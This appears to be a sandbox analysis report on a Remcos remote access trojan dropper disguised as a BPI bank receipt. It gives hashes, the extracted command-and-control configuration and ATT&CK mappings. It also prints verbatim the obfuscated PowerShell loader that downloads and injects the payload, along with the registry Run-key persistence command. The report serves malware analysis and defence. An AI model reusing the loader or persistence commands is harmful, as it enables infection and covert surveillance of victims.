remcos | a887a1ee3ca3cdaa17f0785a774432a68ba41aa9930fa41ac957dd10d467daed

Analysis

max time kernel
299s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-10-2024 00:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Comprovativo-Operacao-App-BPI-Empresas PT6583658375.bat
Size

5KB
MD5

620c71177317e4d49759a6859b4cd0c1
SHA1

a0f7e36d02447e39061c05b3d57f0a23b0c1138d
SHA256

8dd5fd174ee703a43ab5084fdaba84d074152e46b84d588bf63f9d5cd2f673d1
SHA512

a48e32576ea4c2c076269ce26d12f650b90c40307c4049721af8940aea5a5b65cbbe3963a795784dd5f33a4634ebd5cc868f31a761a52d944d81f34905528d2d
SSDEEP

96:gwTiRaJK4FkWL9HVfpB1K4U0NA13Xloa+fHmzHCzAzmw18nvsB1b8Dj79Z6ZwPmx:KRGHCW5HVf1ub3aTmjC0zmw1hMHeZ6mx

Score

10^/10

remcos pw discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

okoro.duckdns.org:51525

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-26Y2B1
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 64 IoCs

flow	pid	Process
7	2756	powershell.exe
40	4188	msiexec.exe
42	4188	msiexec.exe
45	4188	msiexec.exe
47	4188	msiexec.exe
48	4188	msiexec.exe
49	4188	msiexec.exe
50	4188	msiexec.exe
51	4188	msiexec.exe
52	4188	msiexec.exe
53	4188	msiexec.exe
54	4188	msiexec.exe
55	4188	msiexec.exe
56	4188	msiexec.exe
57	4188	msiexec.exe
58	4188	msiexec.exe
59	4188	msiexec.exe
60	4188	msiexec.exe
61	4188	msiexec.exe
64	4188	msiexec.exe
66	4188	msiexec.exe
67	4188	msiexec.exe
68	4188	msiexec.exe
71	4188	msiexec.exe
73	4188	msiexec.exe
74	4188	msiexec.exe
75	4188	msiexec.exe
76	4188	msiexec.exe
77	4188	msiexec.exe
78	4188	msiexec.exe
79	4188	msiexec.exe
80	4188	msiexec.exe
81	4188	msiexec.exe
82	4188	msiexec.exe
83	4188	msiexec.exe
85	4188	msiexec.exe
86	4188	msiexec.exe
87	4188	msiexec.exe
90	4188	msiexec.exe
92	4188	msiexec.exe
95	4188	msiexec.exe
97	4188	msiexec.exe
98	4188	msiexec.exe
99	4188	msiexec.exe
104	4188	msiexec.exe
113	4188	msiexec.exe
114	4188	msiexec.exe
115	4188	msiexec.exe
116	4188	msiexec.exe
117	4188	msiexec.exe
118	4188	msiexec.exe
119	4188	msiexec.exe
120	4188	msiexec.exe
121	4188	msiexec.exe
122	4188	msiexec.exe
123	4188	msiexec.exe
124	4188	msiexec.exe
125	4188	msiexec.exe
126	4188	msiexec.exe
127	4188	msiexec.exe
128	4188	msiexec.exe
129	4188	msiexec.exe
130	4188	msiexec.exe
131	4188	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1796	powershell.exe
2756	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tobindsvrks = "%Skyrs% -windowstyle 1 $Julekalenderne=(gp -Path 'HKCU:\\Software\\Bassethundenes\\').Afsprres;%Skyrs% ($Julekalenderne)"	reg.exe

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1796	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4188	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1796	powershell.exe
4188	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1060	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2756	powershell.exe
2756	powershell.exe
1796	powershell.exe
1796	powershell.exe
1796	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1796	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4188	msiexec.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4896 wrote to memory of 2756	4896	cmd.exe	85
PID 4896 wrote to memory of 2756	4896	cmd.exe	85
PID 1796 wrote to memory of 4188	1796	powershell.exe	103
PID 1796 wrote to memory of 4188	1796	powershell.exe	103
PID 1796 wrote to memory of 4188	1796	powershell.exe	103
PID 1796 wrote to memory of 4188	1796	powershell.exe	103
PID 4188 wrote to memory of 1968	4188	msiexec.exe	106
PID 4188 wrote to memory of 1968	4188	msiexec.exe	106
PID 4188 wrote to memory of 1968	4188	msiexec.exe	106
PID 1968 wrote to memory of 1060	1968	cmd.exe	109
PID 1968 wrote to memory of 1060	1968	cmd.exe	109
PID 1968 wrote to memory of 1060	1968	cmd.exe	109

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Comprovativo-Operacao-App-BPI-Empresas PT6583658375.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden " <#Armill Koloniseredes Plait Bullfice #>;$Chancen='Ashiver';<#Contrefort Innoculating Biarcuated #>;$Enhedshistorie=$Defilement+$host.UI;function Kreditkort($Corrosible){If ($Enhedshistorie) {$Epistemologiske++;}$Kjolens=$Doksttendes+$Corrosible.'Length'-$Epistemologiske; for( $Rockskipper=4;$Rockskipper -lt $Kjolens;$Rockskipper+=5){$Chronometrically++;$Brsfiasko210+=$Corrosible[$Rockskipper];$Eksplosionsbranden67='Illusionerne';}$Brsfiasko210;}function Noumenality($Hydrognosy){ & ($Barskere) ($Hydrognosy);}$Urethrophyma=Kreditkort 'Pa aMDikooSkolz guriP.aslFrinl onia Ord/Over ';$Urethrophyma+=Kreditkort ' Me 5 U.d.Bevg0feri Duod(PeriWDrugi,asin AmpdVa mo Modw Dags Spe StjrN oldTFor Uns1Unbr0 T r.Udki0,ast;Py.e GalWSetii Skan Mo.6Rgni4 P e;P eu ValoxMona6 unc4For.;Asat FinrDelev to: Str1Scor3Li s1 gid.Di.d0St p)Hvss Ko gGBeboe npic nloksideoKont/Arac2Lseh0Mani1 st.0,ype0 Bli1Depe0Abor1Rnen Ph FDiseiSubtrPaetedatafEx ro rebx.oan/,brd1Lice3Pla,1Det .Slvf0Tabt ';$Helving=Kreditkort 'FnomUSs esAfteehypoRI ds-DasyaS.nigKondE unhNGrupTG at ';$Strictest=Kreditkort 'Sc mhOvertHulltCribp .ecs Tit:Di.s/ Ina/Ontowtabuwexplw mod.K ndmMesaiswatoHar.tsub.tIncoo ndeTelezHvira Sa,n aadeBra.l M llL.tia Luf.Paabc GenoIntemLuoi/Ka sW enkhSor.e vlelPilok ligl stei asik.ysteJent. eveh ntihArghkS ip ';$Udskrivningsprocenters=Kreditkort 'Sknk>Unc. ';$Barskere=Kreditkort 'OpsmiPnseeCarcX Liq ';$Rockskipperndsuget='botherer';$Rejektion='\Groundnut.Sne';Noumenality (Kreditkort ' osm$ An g verlAnmooHyduB,ladadkniLPege: Da H ManOObseLUd rDAboraWi hrFindb f.tEHuskj apiD Fe.Egudet mul=Stra$SterEUnsunP laV Sem:Sej A A cP Afvp Inhd RevA UrotpockA,rev+Uige$Cu ar EduESjipJS rpeForuk c.tT Brui.ispO DienBl,e ');Noumenality (Kreditkort ' Epi$Lserg fkllCento Pe bNeonAAccuLByld:St,nrsalahi,nuI ErizStumOEnt,tInfiiR secUnce= Sko$SemiSFre tundeREfteIYankCGibbtMinieos rsPjustTrsk.UndesNondPWorkLBawcIAssetgrns(S,ms$ Brau nmDPrd sAspiKOutmrJvnliQuaeV.nfrnNymaidi snRestGPeraselempS rmRAn.ooSk,lcBlaaeShennChaitI caETaglrLullSHist) Una ');Noumenality (Kreditkort ' Unt[ ersnToneeRealTsels..ektsPis E,ukkRR imvMeloIMet CDiloE TauPtidso HetiBrneNCrevtBoplMHydraCon,n CovAK.stGEcrueUn,aRPsal] Ups: Sea:Deprs GalEPhilc EpiUP,euRWarni I iTAntay H ePRhytrMagnoProjtCaneO,jerCseroOAdvoLunre Over=Ordh Fle[l ddnHypoeFgtetCome.Unals NitEpacicIntruCli r udI Ud tAfguyKu dPSnobreur OI olTs,ano TusCVenuOP fil ValtLecaYSab pOpdaEDaab]F,st:Stni:EproTDokuLKlveSStre1St m2.rem ');$Strictest=$Rhizotic[0];$undertegnelsen=(Kreditkort 'Rell$EndoGHeadl einO,bscB bokaDaa,lNo m:FrankBundlDiskAGlycG impESt ltR bsePilfMFor aLeonEAnt RBrnenSl vE NiksGn d=U ernSkumeDeprW yld-AzofO punBStu JSprgEMadsCMinitPho .orsSmagyAflvsRangTSabre Es.mHema.BaroN C aESnowTStet.ContwDinoeP lmBUnp cKen,lAnnoI psESpa nRas tRa,a ');Noumenality ($undertegnelsen);Noumenality (Kreditkort ' Mo $ uppKUtoplSektaTrkpgPlageans.tForleSp amSoota DrieAnatrG llnReape nkesFrak.HankHflyveBrn a T mdJen eMagnr DessSpe,[A,is$Fo mHOv re Ob,lRetav utsiAncin Ar gTorn] Tub=Traa$.avmUZed rc meeplantA,skhAlmerAbouoB lopO igh,agayCosymCailaBias ');$Afstber=Kreditkort ' Del$ TgnKW belSli.aTavsgBulneud,it ejleSalumBumsaFu peSickr afbnLurge NonsInfo. Li.DUnavo .liwKamgn odal,elioReimadisad GalFKliniForulBaybeSekt( Pin$TilbSGum tP asrunnaiSavecViratHoveeB.xisRolatU,ho, F.r$BarbACopif S pl upfeResovDeceeGldsr Jose Mel)Kamp ';$Aflevere=$Holdarbejdet;Noumenality (Kreditkort 'Pass$SdmlG LaiLTi hoRetfb WhiAUndelRefo:Wa hSBistUUnfofUnbefFdseU elsAtroEYobsSKarr= Lo (ZiartLeu ESkvaSFiskT .or-NonePTi.sa Tr TEnhaH dm Rkne$ orA.kvtfSemuLNedke ivvKniteSkk rTrffENonh) Fot ');while (!$Suffuses) {Noumenality (Kreditkort 'Blu $bo mgPetrl ecaoOve.bAlteaTw,slVask:IllaHBetiyHemol S yoC,rtzTwanoAntii SlusToastsk t=Pier$ SprtNordrEle,u Grae mim ') ;Noumenality $Afstber;Noumenality (Kreditkort ' Sp,s eritE liaStubr AfltFore-Pr tsScr.LLizaEgourELamepMaho Hi.4Stri ');Noumenality (Kreditkort 'Gede$VincgPapiLPomoOsjleBS deaelixl Tod:Bi.bs LanU edgfUndifDrosuAndesGu.de riaSFj r=Lent(ShorTP raeUnboSMiliTB na- AirP urA ubTGn dHSubs Trev$ Li AC unFUd olUrolEAfspV graEc,inrInc E acb)Quar ') ;Noumenality (Kreditkort ' uxo$UnorG Stel pseoKal BHackA ak,LIso :Ama.aHaraNCigaTFupniDekotUmish Diga ecolRef.ID gsASnusNBi.t=S.ha$TopaGMissLNephO DovBTracaDe.iLOpry: Renu rnnGogodFinaeUnfeRId aSFu tk estrfl aEPus,DFyldNHelleTaleS Sho1Sa a5A.hb2 Ved+Reak+Pare%Hamm$ pearRe,oH LatIaccezRingoFronTNocti K oCEuct. D bCR inO FunUKoncn ,uttMenn ') ;$Strictest=$Rhizotic[$Antithalian];}$Svindenes=301744;$Luftigheds=31316;Noumenality (Kreditkort 'Indu$dr eGBantL DemoForeBDigua U oLbrut:Leg BAnsaLHa sE Hi DExxb Komp=Vens Ned g ndeeAspiT snd-Lon.C DokOTot nPro tRe,sE BagNB llTKell Pap$GearaMaurF,onsLobjeeApnovRy kEIndbrScriEUnd, ');Noumenality (Kreditkort 'Smin$EskegThymlAriao Unib AbeaAk.dlInte:DeviA P vuSludt .proTh,mbKa.ai apoNimbgYnglrNonrafo.sp ildhTegnaWintlCivi1A.me2Nekt Unst=N mi Afte[ riSPar.y ogns G utKir e balmNexo.WechCExpaosummnDamev Pr.eFascr uetJamm]Slen:Kong:S oiF Kvar elioUdn mHexaBSkaaaKancsM steDeve6Suss4NonsSR pat etrSnvsiLorenP,ogg Kon(K li$,kseB ErhlBur.eNestdCoba)Affa ');Noumenality (Kreditkort 'Forp$ub,kg.usslReadoMarlbCubmAHavelsymb: Invr LssEjeepf felu,ntuS.emiIBisaODeriND.oxsO sesKir.a nivLGjo Dpor,o steS Sta2Sy a0Euge7 am .isp= .rt Prol[StrkSUnivY ollSCongTT,rbeVoldMtenj. .ocTsum.EAntiXOverTG.nn. esEFamin RedcKo lo MusD envITideNChu GLing]Plan:G nb: stiAGingsMinic SkaIAwesiEpit. CongSkavePummTRdbesEkspt.userEpicI aagNDo.bgMell(En,o$LarnaBur uDisktVa fOSwagbU,elIB.otoGenngCh oRRok.AInvep rh.hUdspa T nLMil 1Clot2St,f)Napa ');Noumenality (Kreditkort 'elek$Oming Magl H roBillbAr iaModelTota: Bgesodo AUndesP noIh.zza,ell= Dum$RoerrFrugE GlaFVictUAgresAlibICoexo orNEjecsGangsCynoAHoveLRectdOpsto ObbsTagp2 Sle0Bred7 Ing.HypeS Sniucl wbUnprsWhirTSirtRSulfiBesrNChl,ghaem(Hvid$ quasBestV Se,IAmbenTotaD ReaeUdsknTripeUp asDemo,Rept$ Sp L UndUEksaFAsieTBlomIBleeGAtomH L,jeTyngD MirS Gy )R.fo ');Noumenality $Sasia;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2756

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Armill Koloniseredes Plait Bullfice #>;$Chancen='Ashiver';<#Contrefort Innoculating Biarcuated #>;$Enhedshistorie=$Defilement+$host.UI;function Kreditkort($Corrosible){If ($Enhedshistorie) {$Epistemologiske++;}$Kjolens=$Doksttendes+$Corrosible.'Length'-$Epistemologiske; for( $Rockskipper=4;$Rockskipper -lt $Kjolens;$Rockskipper+=5){$Chronometrically++;$Brsfiasko210+=$Corrosible[$Rockskipper];$Eksplosionsbranden67='Illusionerne';}$Brsfiasko210;}function Noumenality($Hydrognosy){ & ($Barskere) ($Hydrognosy);}$Urethrophyma=Kreditkort 'Pa aMDikooSkolz guriP.aslFrinl onia Ord/Over ';$Urethrophyma+=Kreditkort ' Me 5 U.d.Bevg0feri Duod(PeriWDrugi,asin AmpdVa mo Modw Dags Spe StjrN oldTFor Uns1Unbr0 T r.Udki0,ast;Py.e GalWSetii Skan Mo.6Rgni4 P e;P eu ValoxMona6 unc4For.;Asat FinrDelev to: Str1Scor3Li s1 gid.Di.d0St p)Hvss Ko gGBeboe npic nloksideoKont/Arac2Lseh0Mani1 st.0,ype0 Bli1Depe0Abor1Rnen Ph FDiseiSubtrPaetedatafEx ro rebx.oan/,brd1Lice3Pla,1Det .Slvf0Tabt ';$Helving=Kreditkort 'FnomUSs esAfteehypoRI ds-DasyaS.nigKondE unhNGrupTG at ';$Strictest=Kreditkort 'Sc mhOvertHulltCribp .ecs Tit:Di.s/ Ina/Ontowtabuwexplw mod.K ndmMesaiswatoHar.tsub.tIncoo ndeTelezHvira Sa,n aadeBra.l M llL.tia Luf.Paabc GenoIntemLuoi/Ka sW enkhSor.e vlelPilok ligl stei asik.ysteJent. eveh ntihArghkS ip ';$Udskrivningsprocenters=Kreditkort 'Sknk>Unc. ';$Barskere=Kreditkort 'OpsmiPnseeCarcX Liq ';$Rockskipperndsuget='botherer';$Rejektion='\Groundnut.Sne';Noumenality (Kreditkort ' osm$ An g verlAnmooHyduB,ladadkniLPege: Da H ManOObseLUd rDAboraWi hrFindb f.tEHuskj apiD Fe.Egudet mul=Stra$SterEUnsunP laV Sem:Sej A A cP Afvp Inhd RevA UrotpockA,rev+Uige$Cu ar EduESjipJS rpeForuk c.tT Brui.ispO DienBl,e ');Noumenality (Kreditkort ' Epi$Lserg fkllCento Pe bNeonAAccuLByld:St,nrsalahi,nuI ErizStumOEnt,tInfiiR secUnce= Sko$SemiSFre tundeREfteIYankCGibbtMinieos rsPjustTrsk.UndesNondPWorkLBawcIAssetgrns(S,ms$ Brau nmDPrd sAspiKOutmrJvnliQuaeV.nfrnNymaidi snRestGPeraselempS rmRAn.ooSk,lcBlaaeShennChaitI caETaglrLullSHist) Una ');Noumenality (Kreditkort ' Unt[ ersnToneeRealTsels..ektsPis E,ukkRR imvMeloIMet CDiloE TauPtidso HetiBrneNCrevtBoplMHydraCon,n CovAK.stGEcrueUn,aRPsal] Ups: Sea:Deprs GalEPhilc EpiUP,euRWarni I iTAntay H ePRhytrMagnoProjtCaneO,jerCseroOAdvoLunre Over=Ordh Fle[l ddnHypoeFgtetCome.Unals NitEpacicIntruCli r udI Ud tAfguyKu dPSnobreur OI olTs,ano TusCVenuOP fil ValtLecaYSab pOpdaEDaab]F,st:Stni:EproTDokuLKlveSStre1St m2.rem ');$Strictest=$Rhizotic[0];$undertegnelsen=(Kreditkort 'Rell$EndoGHeadl einO,bscB bokaDaa,lNo m:FrankBundlDiskAGlycG impESt ltR bsePilfMFor aLeonEAnt RBrnenSl vE NiksGn d=U ernSkumeDeprW yld-AzofO punBStu JSprgEMadsCMinitPho .orsSmagyAflvsRangTSabre Es.mHema.BaroN C aESnowTStet.ContwDinoeP lmBUnp cKen,lAnnoI psESpa nRas tRa,a ');Noumenality ($undertegnelsen);Noumenality (Kreditkort ' Mo $ uppKUtoplSektaTrkpgPlageans.tForleSp amSoota DrieAnatrG llnReape nkesFrak.HankHflyveBrn a T mdJen eMagnr DessSpe,[A,is$Fo mHOv re Ob,lRetav utsiAncin Ar gTorn] Tub=Traa$.avmUZed rc meeplantA,skhAlmerAbouoB lopO igh,agayCosymCailaBias ');$Afstber=Kreditkort ' Del$ TgnKW belSli.aTavsgBulneud,it ejleSalumBumsaFu peSickr afbnLurge NonsInfo. Li.DUnavo .liwKamgn odal,elioReimadisad GalFKliniForulBaybeSekt( Pin$TilbSGum tP asrunnaiSavecViratHoveeB.xisRolatU,ho, F.r$BarbACopif S pl upfeResovDeceeGldsr Jose Mel)Kamp ';$Aflevere=$Holdarbejdet;Noumenality (Kreditkort 'Pass$SdmlG LaiLTi hoRetfb WhiAUndelRefo:Wa hSBistUUnfofUnbefFdseU elsAtroEYobsSKarr= Lo (ZiartLeu ESkvaSFiskT .or-NonePTi.sa Tr TEnhaH dm Rkne$ orA.kvtfSemuLNedke ivvKniteSkk rTrffENonh) Fot ');while (!$Suffuses) {Noumenality (Kreditkort 'Blu $bo mgPetrl ecaoOve.bAlteaTw,slVask:IllaHBetiyHemol S yoC,rtzTwanoAntii SlusToastsk t=Pier$ SprtNordrEle,u Grae mim ') ;Noumenality $Afstber;Noumenality (Kreditkort ' Sp,s eritE liaStubr AfltFore-Pr tsScr.LLizaEgourELamepMaho Hi.4Stri ');Noumenality (Kreditkort 'Gede$VincgPapiLPomoOsjleBS deaelixl Tod:Bi.bs LanU edgfUndifDrosuAndesGu.de riaSFj r=Lent(ShorTP raeUnboSMiliTB na- AirP urA ubTGn dHSubs Trev$ Li AC unFUd olUrolEAfspV graEc,inrInc E acb)Quar ') ;Noumenality (Kreditkort ' uxo$UnorG Stel pseoKal BHackA ak,LIso :Ama.aHaraNCigaTFupniDekotUmish Diga ecolRef.ID gsASnusNBi.t=S.ha$TopaGMissLNephO DovBTracaDe.iLOpry: Renu rnnGogodFinaeUnfeRId aSFu tk estrfl aEPus,DFyldNHelleTaleS Sho1Sa a5A.hb2 Ved+Reak+Pare%Hamm$ pearRe,oH LatIaccezRingoFronTNocti K oCEuct. D bCR inO FunUKoncn ,uttMenn ') ;$Strictest=$Rhizotic[$Antithalian];}$Svindenes=301744;$Luftigheds=31316;Noumenality (Kreditkort 'Indu$dr eGBantL DemoForeBDigua U oLbrut:Leg BAnsaLHa sE Hi DExxb Komp=Vens Ned g ndeeAspiT snd-Lon.C DokOTot nPro tRe,sE BagNB llTKell Pap$GearaMaurF,onsLobjeeApnovRy kEIndbrScriEUnd, ');Noumenality (Kreditkort 'Smin$EskegThymlAriao Unib AbeaAk.dlInte:DeviA P vuSludt .proTh,mbKa.ai apoNimbgYnglrNonrafo.sp ildhTegnaWintlCivi1A.me2Nekt Unst=N mi Afte[ riSPar.y ogns G utKir e balmNexo.WechCExpaosummnDamev Pr.eFascr uetJamm]Slen:Kong:S oiF Kvar elioUdn mHexaBSkaaaKancsM steDeve6Suss4NonsSR pat etrSnvsiLorenP,ogg Kon(K li$,kseB ErhlBur.eNestdCoba)Affa ');Noumenality (Kreditkort 'Forp$ub,kg.usslReadoMarlbCubmAHavelsymb: Invr LssEjeepf felu,ntuS.emiIBisaODeriND.oxsO sesKir.a nivLGjo Dpor,o steS Sta2Sy a0Euge7 am .isp= .rt Prol[StrkSUnivY ollSCongTT,rbeVoldMtenj. .ocTsum.EAntiXOverTG.nn. esEFamin RedcKo lo MusD envITideNChu GLing]Plan:G nb: stiAGingsMinic SkaIAwesiEpit. CongSkavePummTRdbesEkspt.userEpicI aagNDo.bgMell(En,o$LarnaBur uDisktVa fOSwagbU,elIB.otoGenngCh oRRok.AInvep rh.hUdspa T nLMil 1Clot2St,f)Napa ');Noumenality (Kreditkort 'elek$Oming Magl H roBillbAr iaModelTota: Bgesodo AUndesP noIh.zza,ell= Dum$RoerrFrugE GlaFVictUAgresAlibICoexo orNEjecsGangsCynoAHoveLRectdOpsto ObbsTagp2 Sle0Bred7 Ing.HypeS Sniucl wbUnprsWhirTSirtRSulfiBesrNChl,ghaem(Hvid$ quasBestV Se,IAmbenTotaD ReaeUdsknTripeUp asDemo,Rept$ Sp L UndUEksaFAsieTBlomIBleeGAtomH L,jeTyngD MirS Gy )R.fo ');Noumenality $Sasia;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4188
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tobindsvrks" /t REG_EXPAND_SZ /d "%Skyrs% -windowstyle 1 $Julekalenderne=(gp -Path 'HKCU:\Software\Bassethundenes\').Afsprres;%Skyrs% ($Julekalenderne)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1968
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tobindsvrks" /t REG_EXPAND_SZ /d "%Skyrs% -windowstyle 1 $Julekalenderne=(gp -Path 'HKCU:\Software\Bassethundenes\').Afsprres;%Skyrs% ($Julekalenderne)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Network Service Discovery

T1046

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
e58c423ef6253b50fb211f186f8ad9fa

SHA1
98e878cd3e4d45a76b8d3bc2661648fd7eed375f

SHA256
c9217a6ff9a904d9a582de6ba2bc983d7b1d03e2c9775f9cf3f6b6670a42c25e

SHA512
0b95bf9264b11a7936b542764ebb149f8ecd1adafffee3626a62d9e8d10525f20a625a523a604e3ae171b35afb14db9af887aa3217917461fde0b91c27acd1a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71444def27770d9071039d005d0323b7

SHA1
cef8654e95495786ac9347494f4417819373427e

SHA256
8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

SHA512
a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jqv1k402.yzj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Groundnut.Sne

Filesize
433KB

MD5
4371c4045030ab90efd27669cefc3992

SHA1
ee1f69c940cccf9e833dcc60c71154d0a1c58c31

SHA256
961baeff7671565f3ffa4ca1a86d6c36b56f664449e0b33eef7a13431756480a

SHA512
2faa0c05417d82f24cf8271cf01e467920bb277caf20081c841ebfbf42b4e81967d5a2421ac188162f34a2380fc0a9850a6c32e1ff681ea9717bc1aba3a2e58e

Download Submit
memory/1796-41-0x0000000006920000-0x000000000696C000-memory.dmp

Filesize
304KB

Download
memory/1796-45-0x0000000007B00000-0x0000000007B22000-memory.dmp

Filesize
136KB

Download
memory/1796-58-0x00000000753E0000-0x0000000075B90000-memory.dmp

Filesize
7.7MB

Download
memory/1796-56-0x00000000753E0000-0x0000000075B90000-memory.dmp

Filesize
7.7MB

Download
memory/1796-22-0x00000000753EE000-0x00000000753EF000-memory.dmp

Filesize
4KB

Download
memory/1796-23-0x0000000002FC0000-0x0000000002FF6000-memory.dmp

Filesize
216KB

Download
memory/1796-25-0x0000000005BA0000-0x00000000061C8000-memory.dmp

Filesize
6.2MB

Download
memory/1796-24-0x00000000753E0000-0x0000000075B90000-memory.dmp

Filesize
7.7MB

Download
memory/1796-26-0x0000000005920000-0x0000000005942000-memory.dmp

Filesize
136KB

Download
memory/1796-27-0x0000000005AC0000-0x0000000005B26000-memory.dmp

Filesize
408KB

Download
memory/1796-28-0x00000000061D0000-0x0000000006236000-memory.dmp

Filesize
408KB

Download
memory/1796-38-0x00000000063C0000-0x0000000006714000-memory.dmp

Filesize
3.3MB

Download
memory/1796-55-0x00000000753E0000-0x0000000075B90000-memory.dmp

Filesize
7.7MB

Download
memory/1796-40-0x00000000068F0000-0x000000000690E000-memory.dmp

Filesize
120KB

Download
memory/1796-54-0x00000000753EE000-0x00000000753EF000-memory.dmp

Filesize
4KB

Download
memory/1796-42-0x0000000008140000-0x00000000087BA000-memory.dmp

Filesize
6.5MB

Download
memory/1796-43-0x0000000006EA0000-0x0000000006EBA000-memory.dmp

Filesize
104KB

Download
memory/1796-53-0x0000000009320000-0x000000000E16D000-memory.dmp

Filesize
78.3MB

Download
memory/1796-44-0x0000000007B60000-0x0000000007BF6000-memory.dmp

Filesize
600KB

Download
memory/1796-46-0x0000000008D70000-0x0000000009314000-memory.dmp

Filesize
5.6MB

Download
memory/1796-52-0x00000000753E0000-0x0000000075B90000-memory.dmp

Filesize
7.7MB

Download
memory/1796-48-0x00000000753E0000-0x0000000075B90000-memory.dmp

Filesize
7.7MB

Download
memory/1796-49-0x00000000753E0000-0x0000000075B90000-memory.dmp

Filesize
7.7MB

Download
memory/1796-50-0x00000000753E0000-0x0000000075B90000-memory.dmp

Filesize
7.7MB

Download
memory/1796-51-0x00000000753E0000-0x0000000075B90000-memory.dmp

Filesize
